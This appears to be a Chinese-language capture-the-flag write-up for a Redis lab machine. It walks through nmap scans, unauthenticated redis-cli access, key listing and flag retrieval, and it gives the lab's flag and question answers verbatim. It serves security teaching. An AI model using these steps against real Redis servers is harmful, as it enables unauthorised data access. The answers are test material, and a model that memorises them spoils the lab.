前面讲渗透流程,后面会集中回答问题。
连接 :
open starting_point_changeTheWay.o
开启靶机,靶机 IP 为:10.129.77.111
# 命令
nmap --min-rate 10000 -p- 10.129.77.111 -o nmapscan/port
# 输出
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-09 23:17 CST
Nmap scan report for 10.129.77.111
Host is up (0.31s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
6379/tcp open redis
可见只开放了 6379 一个端口。
# 命令
nmap -sV -sT -O -p6379 10.129.77.111 -o nmapscan/details
# 输出
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-09 23:21 CST
Nmap scan report for 10.129.77.111
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 5.0.7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.34 seconds
Redis 版本为 5.0.7 ,操作系统版本为 Linux 5.X 。
# 命令
nmap --script=vuln -p6379 10.129.77.111 -o nmapscan/vuln
# 输出
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-09 23:23 CST
Nmap scan report for 10.129.77.111
Host is up (0.29s latency).
PORT STATE SERVICE
6379/tcp open redis
Nmap done: 1 IP address (1 host up) scanned in 28.68 seconds
并未发现更多信息。
# 命令
nmap -sU -p6379 10.129.77.111 -o nmapscan/udp
# 输出
arting Nmap 7.93 ( https://nmap.org ) at 2023-12-09 23:24 CST
Nmap scan report for 10.129.77.111
Host is up (0.31s latency).
PORT STATE SERVICE
6379/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds
没有开放的 UDP 端口。
redis 是一个开源的使用 ANSI C 语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的 API 。和 Memcached 类似。redis 支持存储的 value 类型相对更多,包括 string (字符串)、list (链表)、set (集合)和 zset (有序集合)。
因此,redis 是一个内存数据库。
redis-cli 是用来远程连接 redis 的工具。
kali 上使用以下命令即可安装:
apt install redis-tools
redis-cli -h host -p port [-a password]
在这里是:
redis-cli -h 10.129.77.111 -p 6379
由于存在未授权访问,故不需要 -a 字段。-a 为可选字段。
此时弹出的命令提示符为:
10.129.77.111:6379>
表明已经获得 redis 数据库权限。
# 输入
info
# 输出
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-77-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.3.0
process_id:753
run_id:142b8d1c4c1c887bd769ce828eaed3036028ab70
tcp_port:6379
uptime_in_seconds:2733
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:7638905
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
# Clients
connected_clients:1
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0
# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:5828608
used_memory_rss_human:5.56M
used_memory_peak:859624
used_memory_peak_human:839.48K
used_memory_peak_perc:100.00%
used_memory_overhead:846142
used_memory_startup:796224
used_memory_dataset:13482
used_memory_dataset_perc:21.26%
allocator_allocated:1564792
allocator_active:1937408
allocator_resident:9158656
total_system_memory:2084024320
total_system_memory_human:1.94G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.24
allocator_frag_bytes:372616
allocator_rss_ratio:4.73
allocator_rss_bytes:7221248
rss_overhead_ratio:0.64
rss_overhead_bytes:-3330048
mem_fragmentation_ratio:7.13
mem_fragmentation_bytes:5010992
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1702135889
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:413696
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0
# Stats
total_connections_received:9
total_commands_processed:7
instantaneous_ops_per_sec:0
total_net_input_bytes:518
total_net_output_bytes:14861
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:479
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0
# Replication
role:master
connected_slaves:0
master_replid:eca06822bbaca983857ec952daebe25cdd238745
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:2.349627
used_cpu_user:2.633147
used_cpu_sys_children:0.001884
used_cpu_user_children:0.000000
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
# 语法
select index
数据库索引号 index 用数字值指定,以 0 作为起始索引值。
如选择索引值为 0 的数据库:
select 0
前面说了,redis 数据库是 Key-Value 型数据库,所以里面的数据存储形式都是键值对的形式。
# 输入
keys *
# 输出
1) "numb"
2) "flag"
3) "temp"
4) "stor"
# 命令
get key_name
# 输入
get flag
# 输出
"03e1d2b376c37ab3f5319922053953eb"
Which TCP port is open on the machine?
6379
Which service is running on the port that is open on the machine?
redis
What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database
In-memory Database(内存型数据库)
Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.
redis-cli
Which flag is used with the Redis command-line utility to specify the hostname?
-h
Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?
info
What is the version of the Redis server being used on the target machine?
5.0.7
Which command is used to select the desired database in Redis?
select
How many keys are present inside the database with index 0?
4
Which command is used to obtain all the keys in a database?
keys *
Submit root flag
03e1d2b376c37ab3f5319922053953eb
本台靶机考查 redis 未授权访问,但是并未涉及到更进一步的提权拿 shell ,关于此漏洞的提权利用可以去看一篇博客:
https://www.cnblogs.com/ly-lyy/articles/17305843.html#%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8B
里面提到的三种利用该漏洞的提权方式值得大家学习。